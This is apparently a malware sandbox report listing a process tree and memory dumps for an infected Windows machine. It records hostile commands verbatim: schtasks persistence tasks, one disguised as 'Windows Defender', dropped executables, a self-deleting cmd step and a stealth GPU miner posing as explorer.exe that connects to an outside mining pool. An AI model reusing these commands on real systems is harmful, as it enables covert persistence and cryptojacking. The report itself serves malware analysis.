                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                                                                                                                                          27⤵
                                                                                                                                                                                                                                                            PID:8004
                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                                                                                                                                              28⤵
                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                              PID:8140
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                                                                                                            27⤵
                                                                                                                                                                                                                                                              PID:3360
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                                                                                                                                                28⤵
                                                                                                                                                                                                                                                                  PID:3872
                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                                                                                                                                                    29⤵
                                                                                                                                                                                                                                                                      PID:3952
                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                                                                                                                                                        30⤵
                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                        PID:7884
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                                                                                                                      29⤵
                                                                                                                                                                                                                                                                        PID:1084
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                                                                                                                                                          30⤵
                                                                                                                                                                                                                                                                            PID:7724
                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                                                                                                                                                              31⤵
                                                                                                                                                                                                                                                                                PID:2968
                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                  PID:2380
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                                                                                                                                31⤵
                                                                                                                                                                                                                                                                                  PID:3760
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                                                                                                                                                                    32⤵
                                                                                                                                                                                                                                                                                      PID:3596
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                                                                                                                                                                        33⤵
                                                                                                                                                                                                                                                                                          PID:1324
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                                                                                                                                                                            34⤵
                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                            PID:7568
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                                                                                                                                          33⤵
                                                                                                                                                                                                                                                                                            PID:7652
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                                                                                                                                                                              34⤵
                                                                                                                                                                                                                                                                                                PID:1088
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                                                                                                                                                                                  35⤵
                                                                                                                                                                                                                                                                                                    PID:7676
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                                                                                                                                                                                      36⤵
                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                      PID:3168
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                                                                                                                                                    35⤵
                                                                                                                                                                                                                                                                                                      PID:3652
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                                                                                                                                                                                        36⤵
                                                                                                                                                                                                                                                                                                          PID:3376
                                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0xebe3437bbAF913c179d317d2f9D7D897f2957d76`.123:[email protected]:19999/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=1 --cinit-idle-gpu=40 --cinit-stealth --cinit-etc
                                                                                                                                                                                                                                                                                                        35⤵
                                                                                                                                                                                                                                                                                                          PID:7628
                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0xebe3437bbAF913c179d317d2f9D7D897f2957d76`.123:[email protected]:19999/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=1 --cinit-idle-gpu=40 --cinit-stealth --cinit-etc
                                                                                                                                                                                                                                                                                                      33⤵
                                                                                                                                                                                                                                                                                                        PID:3360
                                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0xebe3437bbAF913c179d317d2f9D7D897f2957d76`.123:[email protected]:19999/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=1 --cinit-idle-gpu=40 --cinit-stealth --cinit-etc
                                                                                                                                                                                                                                                                                                    31⤵
                                                                                                                                                                                                                                                                                                      PID:3660
                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0xebe3437bbAF913c179d317d2f9D7D897f2957d76`.123:[email protected]:19999/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=1 --cinit-idle-gpu=40 --cinit-stealth --cinit-etc
                                                                                                                                                                                                                                                                                                  29⤵
                                                                                                                                                                                                                                                                                                    PID:7672
                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0xebe3437bbAF913c179d317d2f9D7D897f2957d76`.123:[email protected]:19999/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=1 --cinit-idle-gpu=40 --cinit-stealth --cinit-etc
                                                                                                                                                                                                                                                                                                27⤵
                                                                                                                                                                                                                                                                                                  PID:7572
                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0xebe3437bbAF913c179d317d2f9D7D897f2957d76`.123:[email protected]:19999/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=1 --cinit-idle-gpu=40 --cinit-stealth --cinit-etc
                                                                                                                                                                                                                                                                                              25⤵
                                                                                                                                                                                                                                                                                                PID:3524
                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0xebe3437bbAF913c179d317d2f9D7D897f2957d76`.123:[email protected]:19999/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=1 --cinit-idle-gpu=40 --cinit-stealth --cinit-etc
                                                                                                                                                                                                                                                                                            23⤵
                                                                                                                                                                                                                                                                                              PID:2408
                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0xebe3437bbAF913c179d317d2f9D7D897f2957d76`.123:[email protected]:19999/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=1 --cinit-idle-gpu=40 --cinit-stealth --cinit-etc
                                                                                                                                                                                                                                                                                          21⤵
                                                                                                                                                                                                                                                                                            PID:7936
                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0xebe3437bbAF913c179d317d2f9D7D897f2957d76`.123:[email protected]:19999/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=1 --cinit-idle-gpu=40 --cinit-stealth --cinit-etc
                                                                                                                                                                                                                                                                                        19⤵
                                                                                                                                                                                                                                                                                          PID:3376
                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0xebe3437bbAF913c179d317d2f9D7D897f2957d76`.123:[email protected]:19999/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=1 --cinit-idle-gpu=40 --cinit-stealth --cinit-etc
                                                                                                                                                                                                                                                                                      17⤵
                                                                                                                                                                                                                                                                                        PID:2316
                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0xebe3437bbAF913c179d317d2f9D7D897f2957d76`.123:[email protected]:19999/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=1 --cinit-idle-gpu=40 --cinit-stealth --cinit-etc
                                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                                      PID:324
                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0xebe3437bbAF913c179d317d2f9D7D897f2957d76`.123:[email protected]:19999/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=1 --cinit-idle-gpu=40 --cinit-stealth --cinit-etc
                                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                                    PID:3500
                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0xebe3437bbAF913c179d317d2f9D7D897f2957d76`.123:[email protected]:19999/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=1 --cinit-idle-gpu=40 --cinit-stealth --cinit-etc
                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                  PID:3704
                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0xebe3437bbAF913c179d317d2f9D7D897f2957d76`.123:[email protected]:19999/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=1 --cinit-idle-gpu=40 --cinit-stealth --cinit-etc
                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                PID:2980
                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0xebe3437bbAF913c179d317d2f9D7D897f2957d76`.123:[email protected]:19999/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=1 --cinit-idle-gpu=40 --cinit-stealth --cinit-etc
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                              PID:8180
                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0xebe3437bbAF913c179d317d2f9D7D897f2957d76`.123:[email protected]:19999/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=1 --cinit-idle-gpu=40 --cinit-stealth --cinit-etc
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:7708
                                                                                                                                                                                                                                                                      • C:\ProgramData\NetTool\SRVST35ool.exe
                                                                                                                                                                                                                                                                        "C:\ProgramData\NetTool\SRVST35ool.exe"
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                        PID:7864
                                                                                                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\WerFault.exe -u -p 7864 -s 572
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                          PID:7948
                                                                                                                                                                                                                                                                      • C:\ProgramData\NetTool\SRVST3otol.exe
                                                                                                                                                                                                                                                                        "C:\ProgramData\NetTool\SRVST3otol.exe"
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                                                        PID:7884
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                          "schtasks" /create /tn "Windows Defender" /sc ONLOGON /tr "C:\ProgramData\NetTool\SRVST3otol.exe" /rl HIGHEST /f
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                          PID:7828
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\driver\driver.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\driver\driver.exe" -d2
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:7660
                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c del C:\PROGRA~1\Load.exe >> NUL
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:6728
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:3252
                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:812
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                            PID:2764
                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                            PID:2636
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                            PID:5840
                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                            PID:6696
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                            PID:7612
                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                            PID:7800
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:7904
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                              timeout 3
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                              PID:7628
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "DrivxxxxdcerInxsa6tllServ" /tr '"C:\Users\Admin\AppData\Roaming\DrivxxxxdcerInxsa6tllServ.exe"'
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                              PID:7692
                                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "1231045685-1188030602-17458951711958378896-18387565521666908751-13914104671179295800"
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:3504

                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                              • memory/296-60-0x00000000757E1000-0x00000000757E3000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                              • memory/296-61-0x0000000000400000-0x000000000042B000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                172KB

                                                                                                                                                                                                                                                                              • memory/656-79-0x0000000000400000-0x0000000000416000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                88KB

                                                                                                                                                                                                                                                                              • memory/756-112-0x000007FEF1940000-0x000007FEF29D6000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                16.6MB

                                                                                                                                                                                                                                                                              • memory/756-118-0x00000000020C6000-0x00000000020E5000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                124KB

                                                                                                                                                                                                                                                                              • memory/756-109-0x00000000020C0000-0x00000000020C2000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                              • memory/808-75-0x0000000000B40000-0x0000000000B42000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                              • memory/812-278-0x0000000000070000-0x0000000000077000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                28KB

                                                                                                                                                                                                                                                                              • memory/812-279-0x0000000000060000-0x000000000006C000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                                                                              • memory/876-187-0x0000000000ED0000-0x0000000000F40000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                448KB

                                                                                                                                                                                                                                                                              • memory/876-186-0x0000000000980000-0x00000000009CB000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                300KB

                                                                                                                                                                                                                                                                              • memory/1156-251-0x0000000000400000-0x0000000000495000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                596KB

                                                                                                                                                                                                                                                                              • memory/1156-250-0x0000000000710000-0x00000000007A1000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                580KB

                                                                                                                                                                                                                                                                              • memory/1196-229-0x0000000003DD0000-0x0000000003DE7000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                92KB

                                                                                                                                                                                                                                                                              • memory/1396-108-0x0000000002170000-0x0000000002172000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                              • memory/1396-102-0x000007FEF1940000-0x000007FEF29D6000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                16.6MB

                                                                                                                                                                                                                                                                              • memory/1396-119-0x0000000002176000-0x0000000002195000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                124KB

                                                                                                                                                                                                                                                                              • memory/1396-120-0x0000000002195000-0x0000000002196000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/1396-121-0x00000000021F0000-0x0000000002209000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                                                              • memory/1532-89-0x0000000073FA1000-0x0000000073FA3000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                              • memory/1532-88-0x0000000000240000-0x0000000000241000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/1588-299-0x0000000002B60000-0x0000000002B61000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/1588-290-0x0000000002B00000-0x0000000002B01000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/1992-107-0x0000000000B40000-0x0000000000B42000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                              • memory/2000-70-0x0000000000240000-0x0000000000241000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/2344-138-0x00000000001A0000-0x000000000023D000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                628KB

                                                                                                                                                                                                                                                                              • memory/2432-231-0x0000000001E30000-0x0000000001E31000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/2636-288-0x0000000000070000-0x0000000000079000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                36KB

                                                                                                                                                                                                                                                                              • memory/2636-289-0x0000000000060000-0x000000000006F000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                60KB

                                                                                                                                                                                                                                                                              • memory/2764-287-0x0000000000080000-0x000000000008B000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                44KB

                                                                                                                                                                                                                                                                              • memory/2764-286-0x0000000000110000-0x0000000000117000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                28KB

                                                                                                                                                                                                                                                                              • memory/2816-128-0x0000000000240000-0x0000000000250000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                                              • memory/2816-129-0x0000000000270000-0x0000000000282000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                72KB

                                                                                                                                                                                                                                                                              • memory/2904-150-0x000007FEFB8F1000-0x000007FEFB8F3000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                              • memory/3252-271-0x0000000000080000-0x00000000000EB000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                428KB

                                                                                                                                                                                                                                                                              • memory/3252-270-0x00000000000F0000-0x0000000000164000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                464KB

                                                                                                                                                                                                                                                                              • memory/3304-296-0x0000000005430000-0x0000000005431000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/3304-274-0x0000000000DD0000-0x0000000000DD1000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/3376-282-0x0000000140000000-0x0000000140818000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                8.1MB

                                                                                                                                                                                                                                                                              • memory/3376-284-0x0000000077080000-0x0000000077082000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                              • memory/3460-225-0x0000000000220000-0x000000000022C000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                                                                              • memory/3640-183-0x0000000010000000-0x0000000010002000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                              • memory/3640-184-0x0000000000910000-0x0000000000A11000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                                                                              • memory/3640-185-0x00000000003E0000-0x000000000043C000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                368KB

                                                                                                                                                                                                                                                                              • memory/3660-236-0x0000000000250000-0x0000000000260000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                                              • memory/3660-237-0x0000000000280000-0x0000000000292000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                72KB

                                                                                                                                                                                                                                                                              • memory/3728-189-0x00000000004F0000-0x0000000000560000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                448KB

                                                                                                                                                                                                                                                                              • memory/3728-228-0x00000000030C0000-0x00000000031C6000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                                                                              • memory/3788-222-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                48KB

